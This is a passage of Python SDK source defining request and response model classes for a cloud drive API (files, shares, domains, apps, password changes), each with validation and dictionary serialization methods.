        'encrypt_mode', 'file_extension', 'file_id', 'hidden',
        'image_media_metadata', 'labels', 'location', 'meta', 'name',
        'parent_file_id', 'punish_flag', 'share_id', 'size', 'starred',
        'status', 'stream_locations', 'streams_info', 'thumbnail',
        'trashed_at', 'type', 'updated_at', 'upload_id', 'url', 'user_meta',
        'video_media_metadata', 'video_preview_metadata',
    )
    _NESTED = ('image_media_metadata', 'video_media_metadata',
               'video_preview_metadata')

    @staticmethod
    def _wire_key(attr):
        # crc_64hash is the only attribute whose map key differs.
        return 'crc64_hash' if attr == 'crc_64hash' else attr

    def __init__(
        self,
        category: str = None,
        characteristic_hash: str = None,
        content_hash: str = None,
        content_hash_name: str = None,
        content_type: str = None,
        crc_64hash: str = None,
        created_at: str = None,
        description: str = None,
        domain_id: str = None,
        download_url: str = None,
        drive_id: str = None,
        encrypt_mode: str = None,
        file_extension: str = None,
        file_id: str = None,
        hidden: bool = None,
        image_media_metadata: ImageMediaResponse = None,
        labels: List[str] = None,
        location: str = None,
        meta: str = None,
        name: str = None,
        parent_file_id: str = None,
        punish_flag: int = None,
        share_id: str = None,
        size: int = None,
        starred: bool = None,
        status: str = None,
        stream_locations: dict = None,
        streams_info: dict = None,
        thumbnail: str = None,
        trashed_at: str = None,
        type: str = None,
        updated_at: str = None,
        upload_id: str = None,
        url: str = None,
        user_meta: str = None,
        video_media_metadata: VideoMediaResponse = None,
        video_preview_metadata: VideoPreviewResponse = None,
    ):
        # category
        self.category = category
        # characteristic hash
        self.characteristic_hash = characteristic_hash
        # content hash
        self.content_hash = content_hash
        # content_hash_name
        self.content_hash_name = content_hash_name
        # content_type
        self.content_type = content_type
        # crc64_hash (serialized under the wire key 'crc64_hash')
        self.crc_64hash = crc_64hash
        # created_at
        self.created_at = created_at
        # description
        self.description = description
        # domain id
        self.domain_id = domain_id
        # download_url
        self.download_url = download_url
        # drive_id
        self.drive_id = drive_id
        # encrypt_mode
        self.encrypt_mode = encrypt_mode
        # file_extension
        self.file_extension = file_extension
        # file_id
        self.file_id = file_id
        # hidden (type: boolean) — was a stray bare annotation statement
        self.hidden = hidden
        # nested image metadata model
        self.image_media_metadata = image_media_metadata
        # labels
        self.labels = labels
        # location
        self.location = location
        self.meta = meta
        # name
        self.name = name
        # parent_file_id
        self.parent_file_id = parent_file_id
        self.punish_flag = punish_flag
        self.share_id = share_id
        # size
        self.size = size
        # starred (type: boolean) — was a stray bare annotation statement
        self.starred = starred
        # status
        self.status = status
        self.stream_locations = stream_locations
        # @Deprecated streams url info
        self.streams_info = streams_info
        # thumbnail
        self.thumbnail = thumbnail
        # trashed_at
        self.trashed_at = trashed_at
        # type
        self.type = type
        # updated_at
        self.updated_at = updated_at
        # upload_id
        self.upload_id = upload_id
        # url
        self.url = url
        # user_meta
        self.user_meta = user_meta
        # nested video metadata model
        self.video_media_metadata = video_media_metadata
        # nested video-preview metadata model
        self.video_preview_metadata = video_preview_metadata

    def validate(self):
        """Enforce schema constraints and validate nested models.

        ``name`` is required; id-like fields must match their patterns.
        """
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
        if self.image_media_metadata:
            self.image_media_metadata.validate()
        self.validate_required(self.name, 'name')
        if self.name is not None:
            self.validate_pattern(self.name, 'name', '[a-zA-Z0-9.-]{1,1000}')
        if self.parent_file_id is not None:
            self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
            self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
        if self.size is not None:
            self.validate_maximum(self.size, 'size', 53687091200)
            self.validate_minimum(self.size, 'size', 0)
        if self.video_media_metadata:
            self.video_media_metadata.validate()
        if self.video_preview_metadata:
            self.video_preview_metadata.validate()

    def to_map(self):
        """Serialize the non-None attributes into a plain dict.

        Nested metadata models are serialized via their own ``to_map``.
        """
        result = dict()
        for attr in self._ATTRS:
            value = getattr(self, attr)
            if value is None:
                continue
            if attr in self._NESTED:
                result[attr] = value.to_map()
            else:
                result[self._wire_key(attr)] = value
        return result

    def from_map(self, m: dict = None):
        """Load attributes from ``m``; missing/None keys are ignored.

        Nested metadata dicts are deserialized into fresh model instances.
        """
        m = m or dict()
        for attr in self._ATTRS:
            value = m.get(self._wire_key(attr))
            if value is None:
                continue
            if attr == 'image_media_metadata':
                self.image_media_metadata = ImageMediaResponse().from_map(value)
            elif attr == 'video_media_metadata':
                self.video_media_metadata = VideoMediaResponse().from_map(value)
            elif attr == 'video_preview_metadata':
                self.video_preview_metadata = VideoPreviewResponse().from_map(value)
            else:
                setattr(self, attr, value)
        return self
class ConfirmLinkRequest(TeaModel):
    """Request to confirm (bind) a temporary link token."""

    # Attribute names double as wire keys, in serialization order.
    _ATTRS = ('headers', 'temporary_token')

    def __init__(
        self,
        headers: Dict[str, str] = None,
        temporary_token: str = None,
    ):
        self.headers = headers
        # Temporary token to bind; this token can only access the
        # bind / unbind endpoints.
        self.temporary_token = temporary_token

    def validate(self):
        """``temporary_token`` is mandatory."""
        self.validate_required(self.temporary_token, 'temporary_token')

    def to_map(self):
        """Serialize the non-None attributes into a plain dict."""
        result = dict()
        for attr in self._ATTRS:
            value = getattr(self, attr)
            if value is not None:
                result[attr] = value
        return result

    def from_map(self, m: dict = None):
        """Load attributes from ``m``; missing/None keys are ignored."""
        m = m or dict()
        for attr in self._ATTRS:
            if m.get(attr) is not None:
                setattr(self, attr, m.get(attr))
        return self
class CopyFileResponse(TeaModel):
    """File-copy response."""

    # Attribute names double as wire keys, in serialization order.
    _ATTRS = ('async_task_id', 'domain_id', 'drive_id', 'file_id')

    def __init__(
        self,
        async_task_id: str = None,
        domain_id: str = None,
        drive_id: str = None,
        file_id: str = None,
    ):
        # async_task_id
        self.async_task_id = async_task_id
        # domain id
        self.domain_id = domain_id
        # drive_id
        self.drive_id = drive_id
        # file_id
        self.file_id = file_id

    def validate(self):
        """Enforce the id-pattern constraints on the fields that are set."""
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')

    def to_map(self):
        """Serialize the non-None attributes into a plain dict."""
        result = dict()
        for attr in self._ATTRS:
            value = getattr(self, attr)
            if value is not None:
                result[attr] = value
        return result

    def from_map(self, m: dict = None):
        """Load attributes from ``m``; missing/None keys are ignored."""
        m = m or dict()
        for attr in self._ATTRS:
            if m.get(attr) is not None:
                setattr(self, attr, m.get(attr))
        return self
class CorsRule(TeaModel):
    """A single CORS rule."""

    # Attribute names double as wire keys, in serialization order.
    _ATTRS = ('allowed_header', 'allowed_method', 'allowed_origin',
              'expose_header', 'max_age_seconds')

    def __init__(
        self,
        allowed_header: List[str] = None,
        allowed_method: List[str] = None,
        allowed_origin: List[str] = None,
        expose_header: List[str] = None,
        max_age_seconds: int = None,
    ):
        # AllowedHeader
        self.allowed_header = allowed_header
        # AllowedMethod
        self.allowed_method = allowed_method
        # AllowedOrigin
        self.allowed_origin = allowed_origin
        # ExposeHeader
        self.expose_header = expose_header
        # MaxAgeSeconds
        self.max_age_seconds = max_age_seconds

    def validate(self):
        """No constraints to enforce for this model."""
        pass

    def to_map(self):
        """Serialize the non-None attributes into a plain dict."""
        result = dict()
        for attr in self._ATTRS:
            value = getattr(self, attr)
            if value is not None:
                result[attr] = value
        return result

    def from_map(self, m: dict = None):
        """Load attributes from ``m``; missing/None keys are ignored."""
        m = m or dict()
        for attr in self._ATTRS:
            if m.get(attr) is not None:
                setattr(self, attr, m.get(attr))
        return self
class CreateAppRequest(TeaModel):
    """Request to create an application."""

    # Attribute names double as wire keys, in serialization order.
    _ATTRS = ('app_name', 'description', 'is_third_party', 'logo',
              'public_key', 'redirect_uri', 'scope', 'type')

    def __init__(
        self,
        app_name: str = None,
        description: str = None,
        is_third_party: bool = None,
        logo: str = None,
        public_key: str = None,
        redirect_uri: str = None,
        scope: List[str] = None,
        type: str = None,
    ):
        # App name
        self.app_name = app_name
        # App description
        self.description = description
        # whether this is a domain-private (third-party) app
        self.is_third_party = is_third_party
        # App logo/icon
        self.logo = logo
        # public key of the RSA encryption algorithm, PEM format
        self.public_key = public_key
        # App redirect (callback) URI
        self.redirect_uri = redirect_uri
        # App permission scope list
        self.scope = scope
        # App type
        self.type = type

    def validate(self):
        """app_name, logo, public_key, scope and type are mandatory;
        app_name and description are length-limited."""
        self.validate_required(self.app_name, 'app_name')
        if self.app_name is not None:
            self.validate_max_length(self.app_name, 'app_name', 128)
        if self.description is not None:
            self.validate_max_length(self.description, 'description', 128)
        self.validate_required(self.logo, 'logo')
        self.validate_required(self.public_key, 'public_key')
        self.validate_required(self.scope, 'scope')
        self.validate_required(self.type, 'type')

    def to_map(self):
        """Serialize the non-None attributes into a plain dict."""
        result = dict()
        for attr in self._ATTRS:
            value = getattr(self, attr)
            if value is not None:
                result[attr] = value
        return result

    def from_map(self, m: dict = None):
        """Load attributes from ``m``; missing/None keys are ignored."""
        m = m or dict()
        for attr in self._ATTRS:
            if m.get(attr) is not None:
                setattr(self, attr, m.get(attr))
        return self
class CreateDomainRequest(TeaModel):
    """Request payload for creating a domain."""

    # Scalar fields copied verbatim to/from the dict form, in the order
    # they appear in the serialized output before the nested strategy.
    _PLAIN_FIELDS = (
        'auth_config',
        'auth_dingding_app_id',
        'auth_dingding_app_secret',
        'auth_dingding_enable',
        'auth_endpoint_enable',
        'auth_ram_app_id',
        'auth_ram_app_secret',
        'auth_ram_enable',
        'data_hash_name',
        'description',
        'domain_name',
        'event_filename_matches',
        'event_mns_endpoint',
        'event_mns_topic',
        'event_names',
        'event_role_arn',
        'init_drive_enable',
        'init_drive_size',
        'mode',
        'path_type',
    )
    # Scalar fields serialized after the nested strategy.
    _TAIL_FIELDS = ('sharable', 'store_level', 'store_region_list')

    def __init__(
        self,
        auth_config: dict = None,
        auth_dingding_app_id: str = None,
        auth_dingding_app_secret: str = None,
        auth_dingding_enable: bool = None,
        auth_endpoint_enable: bool = None,
        auth_ram_app_id: str = None,
        auth_ram_app_secret: str = None,
        auth_ram_enable: bool = None,
        data_hash_name: str = None,
        description: str = None,
        domain_name: str = None,
        event_filename_matches: str = None,
        event_mns_endpoint: str = None,
        event_mns_topic: str = None,
        event_names: List[str] = None,
        event_role_arn: str = None,
        init_drive_enable: bool = None,
        init_drive_size: int = None,
        mode: str = None,
        path_type: str = None,
        published_app_access_strategy: AppAccessStrategy = None,
        sharable: bool = None,
        store_level: str = None,
        store_region_list: List[str] = None,
    ):
        # authentication related configuration
        self.auth_config = auth_config
        # DingTalk App ID
        self.auth_dingding_app_id = auth_dingding_app_id
        # DingTalk App Secret
        self.auth_dingding_app_secret = auth_dingding_app_secret
        # enable DingTalk authentication
        self.auth_dingding_enable = auth_dingding_enable
        self.auth_endpoint_enable = auth_endpoint_enable
        # RAM App Id
        self.auth_ram_app_id = auth_ram_app_id
        # RAM App Secret
        self.auth_ram_app_secret = auth_ram_app_secret
        # enable RAM authentication
        self.auth_ram_enable = auth_ram_enable
        # data hash algorithm
        self.data_hash_name = data_hash_name
        # domain description
        self.description = description
        # domain name
        self.domain_name = domain_name
        # event notification: MNS filename match pattern
        self.event_filename_matches = event_filename_matches
        # event notification: MNS endpoint
        self.event_mns_endpoint = event_mns_endpoint
        # event notification: MNS topic
        self.event_mns_topic = event_mns_topic
        # list of event names
        self.event_names = event_names
        # event notification: role ARN
        self.event_role_arn = event_role_arn
        # enable automatic drive initialization
        self.init_drive_enable = init_drive_enable
        # size of the automatically initialized drive
        self.init_drive_size = init_drive_size
        # domain mode
        self.mode = mode
        # domain path type
        self.path_type = path_type
        self.published_app_access_strategy = published_app_access_strategy
        # enable sharing
        self.sharable = sharable
        # storage level
        self.store_level = store_level
        # list of storage regions
        self.store_region_list = store_region_list

    def validate(self):
        """Check required fields and the nested access strategy."""
        self.validate_required(self.domain_name, 'domain_name')
        self.validate_required(self.mode, 'mode')
        if self.published_app_access_strategy:
            self.published_app_access_strategy.validate()
        self.validate_required(self.store_region_list, 'store_region_list')

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._PLAIN_FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        # nested model: emit its own dict representation
        if self.published_app_access_strategy is not None:
            result['published_app_access_strategy'] = self.published_app_access_strategy.to_map()
        for field in self._TAIL_FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._PLAIN_FIELDS + self._TAIL_FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        if m.get('published_app_access_strategy') is not None:
            # nested model: decode through its own from_map
            self.published_app_access_strategy = AppAccessStrategy().from_map(
                m['published_app_access_strategy'])
        return self
class CreateDriveResponse(TeaModel):
    """Response body of a create-drive call."""

    _FIELDS = ('domain_id', 'drive_id')

    def __init__(
        self,
        domain_id: str = None,
        drive_id: str = None,
    ):
        # Domain ID
        self.domain_id = domain_id
        # Drive ID
        self.drive_id = drive_id

    def validate(self):
        # No constraints on this response.
        pass

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class UploadPartInfo(TeaModel):
    """One part of a multipart upload: its number, size, and upload URL."""

    _FIELDS = ('content_type', 'etag', 'part_number', 'part_size', 'upload_url')

    def __init__(
        self,
        content_type: str = None,
        etag: str = None,
        part_number: int = None,
        part_size: int = None,
        upload_url: str = None,
    ):
        self.content_type = content_type
        # ETag returned for the uploaded part
        self.etag = etag
        # 1-based part number
        self.part_number = part_number
        # size of the part in bytes
        self.part_size = part_size
        # pre-signed URL to upload this part to
        self.upload_url = upload_url

    def validate(self):
        """Check part number and size against the service limits."""
        if self.part_number is not None:
            # parts are numbered 1..10000
            self.validate_maximum(self.part_number, 'part_number', 10000)
            self.validate_minimum(self.part_number, 'part_number', 1)
        if self.part_size is not None:
            # 100 KB <= part size <= 5 GB
            self.validate_maximum(self.part_size, 'part_size', 5368709120)
            self.validate_minimum(self.part_size, 'part_size', 102400)

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class CreateFileResponse(TeaModel):
    """Response body of a create-file call.

    Carries the identifiers of the created file plus, for multipart
    uploads, the pre-signed part-upload information (`part_info_list`,
    `upload_id`).
    """

    def __init__(
        self,
        domain_id: str = None,
        drive_id: str = None,
        encrypt_mode: str = None,
        exist: bool = None,
        file_id: str = None,
        file_name: str = None,
        location: str = None,
        parent_file_id: str = None,
        part_info_list: List[UploadPartInfo] = None,
        rapid_upload: bool = None,
        status: str = None,
        streams_upload_info: dict = None,
        type: str = None,
        upload_id: str = None,
    ):
        # domain_id
        self.domain_id = domain_id
        # drive_id
        self.drive_id = drive_id
        # encrypt_mode
        self.encrypt_mode = encrypt_mode
        # exist
        # type: boolean
        # NOTE: the line above was previously a bare `type: boolean`
        # statement (a comment that had lost its `#`); restored as a comment.
        self.exist = exist
        # file_id
        self.file_id = file_id
        # file_name
        self.file_name = file_name
        # location
        self.location = location
        # parent_file_id
        self.parent_file_id = parent_file_id
        # part_info_list
        self.part_info_list = part_info_list
        # rapid_upload
        # type: boolean (was a stray statement; restored as a comment)
        self.rapid_upload = rapid_upload
        # status
        self.status = status
        # streams_upload_info
        self.streams_upload_info = streams_upload_info
        # type
        self.type = type
        # upload_id
        self.upload_id = upload_id

    def validate(self):
        """Check length/pattern constraints and validate nested parts."""
        if self.domain_id is not None:
            self.validate_max_length(self.domain_id, 'domain_id', 50)
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9]{1,50}')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')
        if self.file_name is not None:
            self.validate_max_length(self.file_name, 'file_name', 255)
        if self.parent_file_id is not None:
            self.validate_max_length(self.parent_file_id, 'parent_file_id', 50)
            self.validate_pattern(self.parent_file_id, 'parent_file_id', '[a-z0-9]{1,50}')
        if self.part_info_list:
            for k in self.part_info_list:
                if k:
                    k.validate()

    def to_map(self):
        """Serialize every non-None field into a plain dict.

        `part_info_list` is always emitted (possibly empty), each element
        serialized through its own `to_map`.
        """
        result = dict()
        if self.domain_id is not None:
            result['domain_id'] = self.domain_id
        if self.drive_id is not None:
            result['drive_id'] = self.drive_id
        if self.encrypt_mode is not None:
            result['encrypt_mode'] = self.encrypt_mode
        if self.exist is not None:
            result['exist'] = self.exist
        if self.file_id is not None:
            result['file_id'] = self.file_id
        if self.file_name is not None:
            result['file_name'] = self.file_name
        if self.location is not None:
            result['location'] = self.location
        if self.parent_file_id is not None:
            result['parent_file_id'] = self.parent_file_id
        result['part_info_list'] = []
        if self.part_info_list is not None:
            for k in self.part_info_list:
                result['part_info_list'].append(k.to_map() if k else None)
        if self.rapid_upload is not None:
            result['rapid_upload'] = self.rapid_upload
        if self.status is not None:
            result['status'] = self.status
        if self.streams_upload_info is not None:
            result['streams_upload_info'] = self.streams_upload_info
        if self.type is not None:
            result['type'] = self.type
        if self.upload_id is not None:
            result['upload_id'] = self.upload_id
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        if m.get('domain_id') is not None:
            self.domain_id = m.get('domain_id')
        if m.get('drive_id') is not None:
            self.drive_id = m.get('drive_id')
        if m.get('encrypt_mode') is not None:
            self.encrypt_mode = m.get('encrypt_mode')
        if m.get('exist') is not None:
            self.exist = m.get('exist')
        if m.get('file_id') is not None:
            self.file_id = m.get('file_id')
        if m.get('file_name') is not None:
            self.file_name = m.get('file_name')
        if m.get('location') is not None:
            self.location = m.get('location')
        if m.get('parent_file_id') is not None:
            self.parent_file_id = m.get('parent_file_id')
        # part_info_list is reset then rebuilt element-by-element.
        self.part_info_list = []
        if m.get('part_info_list') is not None:
            for k in m.get('part_info_list'):
                temp_model = UploadPartInfo()
                self.part_info_list.append(temp_model.from_map(k))
        if m.get('rapid_upload') is not None:
            self.rapid_upload = m.get('rapid_upload')
        if m.get('status') is not None:
            self.status = m.get('status')
        if m.get('streams_upload_info') is not None:
            self.streams_upload_info = m.get('streams_upload_info')
        if m.get('type') is not None:
            self.type = m.get('type')
        if m.get('upload_id') is not None:
            self.upload_id = m.get('upload_id')
        return self
class CreateShareLinkResponse(TeaModel):
    """Response body of a create-share-link call."""

    _FIELDS = (
        'description',
        'share_id',
        'share_msg',
        'share_name',
        'share_policy',
        'share_pwd',
        'share_url',
    )

    def __init__(
        self,
        description: str = None,
        share_id: str = None,
        share_msg: str = None,
        share_name: str = None,
        share_policy: str = None,
        share_pwd: str = None,
        share_url: str = None,
    ):
        # description
        self.description = description
        # share_id
        self.share_id = share_id
        # share_msg
        self.share_msg = share_msg
        # share_name
        self.share_name = share_name
        # share_policy
        self.share_policy = share_policy
        # share_pwd
        self.share_pwd = share_pwd
        # share_url
        self.share_url = share_url

    def validate(self):
        # No constraints on this response.
        pass

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class CreateShareResponse(TeaModel):
    """Response body of a create-share call."""

    _FIELDS = ('domain_id', 'share_id')

    def __init__(
        self,
        domain_id: str = None,
        share_id: str = None,
    ):
        # domain_id
        self.domain_id = domain_id
        # share_id
        self.share_id = share_id

    def validate(self):
        # No constraints on this response.
        pass

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class DefaultChangePasswordRequest(TeaModel):
    """Request payload for changing a user's password."""

    _FIELDS = (
        'headers',
        'app_id',
        'encrypted_key',
        'new_password',
        'phone_number',
        'phone_region',
        'state',
    )

    def __init__(
        self,
        headers: Dict[str, str] = None,
        app_id: str = None,
        encrypted_key: str = None,
        new_password: str = None,
        phone_number: str = None,
        phone_region: str = None,
        state: str = None,
    ):
        self.headers = headers
        # App ID of the App currently being accessed
        self.app_id = app_id
        # AES-256 symmetric key, encrypted with the App public key for transport
        self.encrypted_key = encrypted_key
        # new password; must contain digits and letters, 8-20 characters
        self.new_password = new_password
        # phone number
        self.phone_number = phone_number
        # country calling code, digits only without the '+' sign; defaults to 86
        self.phone_region = phone_region
        # temporary authorization code for the password change
        self.state = state

    def validate(self):
        """Check that all mandatory fields are present."""
        self.validate_required(self.app_id, 'app_id')
        self.validate_required(self.encrypted_key, 'encrypted_key')
        self.validate_required(self.new_password, 'new_password')
        self.validate_required(self.phone_number, 'phone_number')
        self.validate_required(self.state, 'state')

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class DefaultSetPasswordRequest(TeaModel):
    """Request payload for setting a user's password."""

    _FIELDS = ('headers', 'app_id', 'encrypted_key', 'new_password', 'state')

    def __init__(
        self,
        headers: Dict[str, str] = None,
        app_id: str = None,
        encrypted_key: str = None,
        new_password: str = None,
        state: str = None,
    ):
        self.headers = headers
        # App ID of the App currently being accessed
        self.app_id = app_id
        # AES-256 symmetric key, encrypted with the App public key for transport
        self.encrypted_key = encrypted_key
        # new password; must contain digits and letters, 8-20 characters,
        # transported AES-256 encrypted (CBC mode, PKCS7 padding, base64 encoded)
        self.new_password = new_password
        # temporary authorization code for the password change
        self.state = state

    def validate(self):
        """Check that all mandatory fields are present."""
        self.validate_required(self.app_id, 'app_id')
        self.validate_required(self.encrypted_key, 'encrypted_key')
        self.validate_required(self.new_password, 'new_password')
        self.validate_required(self.state, 'state')

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class DeleteAppRequest(TeaModel):
    """Request payload for deleting an App."""

    def __init__(
        self,
        app_id: str = None,
    ):
        # App ID of the App to delete
        self.app_id = app_id

    def validate(self):
        # app_id is mandatory for this request.
        self.validate_required(self.app_id, 'app_id')

    def to_map(self):
        """Serialize the set field into a plain dict."""
        result = dict()
        for field in ('app_id',):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in ('app_id',):
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class DeleteBizCNameAndCertRequest(TeaModel):
    """Request payload for deleting a business CNAME and its certificate."""

    _FIELDS = ('biz_cname', 'cname_type', 'domain_id', 'is_vpc')

    def __init__(
        self,
        biz_cname: str = None,
        cname_type: str = None,
        domain_id: str = None,
        is_vpc: bool = None,
    ):
        # api cname
        self.biz_cname = biz_cname
        # cname type
        self.cname_type = cname_type
        # domain ID
        self.domain_id = domain_id
        # vpc flag
        self.is_vpc = is_vpc

    def validate(self):
        """Check that cname_type and domain_id are present."""
        self.validate_required(self.cname_type, 'cname_type')
        self.validate_required(self.domain_id, 'domain_id')

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class DeleteBizCNameCertRequest(TeaModel):
    """Request payload for deleting the certificate of a business CNAME."""

    _FIELDS = ('biz_cname', 'cert_id', 'cname_type', 'domain_id', 'is_vpc')

    def __init__(
        self,
        biz_cname: str = None,
        cert_id: str = None,
        cname_type: str = None,
        domain_id: str = None,
        is_vpc: bool = None,
    ):
        # biz cname
        self.biz_cname = biz_cname
        # cert id
        self.cert_id = cert_id
        # cname type
        self.cname_type = cname_type
        # domain ID
        self.domain_id = domain_id
        # vpc flag
        self.is_vpc = is_vpc

    def validate(self):
        """Check that cname_type and domain_id are present."""
        self.validate_required(self.cname_type, 'cname_type')
        self.validate_required(self.domain_id, 'domain_id')

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class DeleteDataCNameAndCertRequest(TeaModel):
    """Request payload for deleting a data CNAME and its certificate."""

    _FIELDS = ('data_cname', 'domain_id', 'location')

    def __init__(
        self,
        data_cname: str = None,
        domain_id: str = None,
        location: str = None,
    ):
        # data cname (e.g. in cn-shanghai)
        self.data_cname = data_cname
        # domain ID
        self.domain_id = domain_id
        # location
        self.location = location

    def validate(self):
        """All three fields are mandatory."""
        self.validate_required(self.data_cname, 'data_cname')
        self.validate_required(self.domain_id, 'domain_id')
        self.validate_required(self.location, 'location')

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class DeleteDomainRequest(TeaModel):
    """Request payload for deleting a domain."""

    def __init__(
        self,
        domain_id: str = None,
    ):
        # Domain ID of the domain to delete
        self.domain_id = domain_id

    def validate(self):
        # domain_id is mandatory for this request.
        self.validate_required(self.domain_id, 'domain_id')

    def to_map(self):
        """Serialize the set field into a plain dict."""
        result = dict()
        for field in ('domain_id',):
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in ('domain_id',):
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class DeleteDriveResponse(TeaModel):
    """Empty response body for a delete-drive call."""

    def __init__(self):
        # A successful delete returns no fields.
        pass

    def validate(self):
        # Nothing to validate on an empty body.
        pass

    def to_map(self):
        """Return an empty dict: this response carries no fields."""
        return dict()

    def from_map(self, m: dict = None):
        """Nothing to read from *m*; return self unchanged."""
        return self
class DeleteFileResponse(TeaModel):
    """Response body of a delete-file call."""

    _FIELDS = ('async_task_id', 'domain_id', 'drive_id', 'file_id')

    def __init__(
        self,
        async_task_id: str = None,
        domain_id: str = None,
        drive_id: str = None,
        file_id: str = None,
    ):
        # async_task_id
        self.async_task_id = async_task_id
        # domain_id
        self.domain_id = domain_id
        # drive_id
        self.drive_id = drive_id
        # file_id
        self.file_id = file_id

    def validate(self):
        """Check identifier patterns and length limits."""
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
        if self.drive_id is not None:
            self.validate_pattern(self.drive_id, 'drive_id', '[0-9]+')
        if self.file_id is not None:
            self.validate_max_length(self.file_id, 'file_id', 50)
            self.validate_pattern(self.file_id, 'file_id', '[a-z0-9]{1,50}')

    def to_map(self):
        """Serialize every non-None field into a plain dict."""
        result = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if value is not None:
                result[field] = value
        return result

    def from_map(self, m: dict = None):
        """Populate fields from *m*; absent or None keys are skipped."""
        m = m or dict()
        for field in self._FIELDS:
            if m.get(field) is not None:
                setattr(self, field, m.get(field))
        return self
class DeleteFilesResponse(TeaModel):
    """Response body of a batch delete-files call."""

    _FIELDS = ('deleted_file_id_list', 'domain_id', 'drive_id')

    def __init__(
        self,
        deleted_file_id_list: List[str] = None,
        domain_id: str = None,
        drive_id: str = None,
    ):
        # IDs of the files that were deleted
        self.deleted_file_id_list = deleted_file_id_list
        # domain_id
        self.domain_id = domain_id
        # drive_id
        self.drive_id = drive_id

    def validate(self):
        """Check identifier patterns."""
        if self.domain_id is not None:
            self.validate_pattern(self.domain_id, 'domain_id', '[a-z0-9A-Z]+')
